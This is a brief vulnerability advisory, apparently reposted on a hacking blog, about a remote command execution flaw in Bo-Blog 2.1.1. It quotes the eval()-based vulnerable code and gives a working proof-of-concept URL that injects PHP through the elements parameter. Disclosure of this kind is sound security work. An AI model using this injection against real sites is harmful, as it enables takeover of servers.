Bo-Blog 2.1.1 Command Execution

########################## Securitylab.ir ########################

# Application Info:

# Name: bo-blog

# Version: 2.1.1

# Download: http://www.bo-blog.com/download/release/Bo-blogV2.1.1.tar.gz

#################################################################

# Discoverd By: Securitylab.ir

# Website: http://securitylab.ir

# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

#################################################################

# Vulnerability Info:

# Type: Remote Command Execution Vulnerabilities

# Risk: High

#===========================================================

# boblog_class_run.php (in /inc/ folder)

#

# <...

#  function set($elementname, $array, $inherit=0) {

#   global $elements, $tptvalue;

#   if ($inherit==1) global $content;

#   $content[$elementname]=$elements[$elementname];

#

#

#   $a=preg_match("/<!-- php --><!--(.+?)--><!-- \/php -->/is", $content

#

#[$elementname], $phpcode_array);

#   if ($a!=0) {

#    $phpcode=$phpcode_array[1];

#    eval($phpcode);

# ...>

#

# http://localhost/blog/inc/boblog_class_run.php?elements[header]=<!-- php --><!--phpinfo();--><!-- /php -->

#===========================================================

#################################################################

# Securitylab Security Research Team

###################################################################

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking